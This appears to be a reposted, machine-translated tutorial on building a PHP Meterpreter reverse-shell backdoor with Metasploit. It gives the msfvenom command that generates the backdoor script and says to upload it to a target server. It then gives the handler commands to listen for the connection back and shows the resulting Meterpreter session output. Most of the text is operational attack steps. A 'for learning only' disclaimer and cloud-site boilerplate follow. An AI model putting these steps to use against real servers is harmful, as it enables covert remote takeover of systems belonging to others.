Metasploit Framework PHP Reverse back Door Setup Tutorial

Source: Internet
Author: User

Metasploit Introduction

Grey Cap Hacker (3rd edition) Metasploit is a free, downloadable framework through which you can easily access, develop, and attack computer software vulnerabilities. It itself comes with a professional-level vulnerability attack tool with hundreds of known software vulnerabilities. When H.d Moore released Metasploit in 2003, the computer security situation was also permanently changed. As if anyone could be a hacker overnight, everyone could use an attack tool to attack a bug that had not been patched or had just been patched. Software vendors can no longer postpone the release of patches for published vulnerabilities because the Metasploit team has been working to develop attack tools and contribute them to all Metasploit users

Metasploit frame PHP Reverse back door build

Msfvenom-l View all payload
Framework payloads (436 total)
==============================
Name Description
----                                                -----------
Aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
Aix/ppc/shell_find_port Spawn a shell on a established connection
Aix/ppc/shell_interact Simply execve/bin/sh (for inetd programs)
Aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
The other omitted.
This is a PHP reverse back door.
Msfvenom-p php/meterpreter/reverse_tcp--payload-options View Parameters
Options for PAYLOAD/PHP/METERPRETER/REVERSE_TCP:

name:php Meterpreter, PHP Reverse TCP Stager
Module:payload/php/meterpreter/reverse_tcp
platform:php
arch:php
Needs Admin:no
Total size:936
Rank:normal
Provided by:
Egypt <egypt@metasploit.com>
Basic options:
Name Current Setting Required Description
----   ---------------  --------  -----------
Lhost Yes the listen address
Lport 4444 Yes the listen port
Description:
Run a Meterpreter server in PHP. Reverse PHP Connect Back Stager
With checks for disabled functions

Msfvenom-p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234-f Raw >c.php Build script
After the build, remove the front-most annotation from the script and upload it to the target server
Start MSF
Use Exploit/multi/handler
Set PAYLOAD php/meterpreter/reverse_tcp
Set Lhost 192.168.1.2
Set Lport 1234
Exploit, start listening.

Then open the uploaded script from the browser http://xxx.com/c.php
In MSF, you will see
*] Starting the payload handler ...
[*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX
[*] Meterpreter Session 1 opened (192.168.1.2:1234-> xxx.xxx.xxx.xxx:42280) at
Meterpreter >

If the Kali is installed on a virtual machine, a bridging is required, and then the router will kali the DMZ to the extranet

Note: This tutorial is only for learning to use all other consequences with this site has no

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.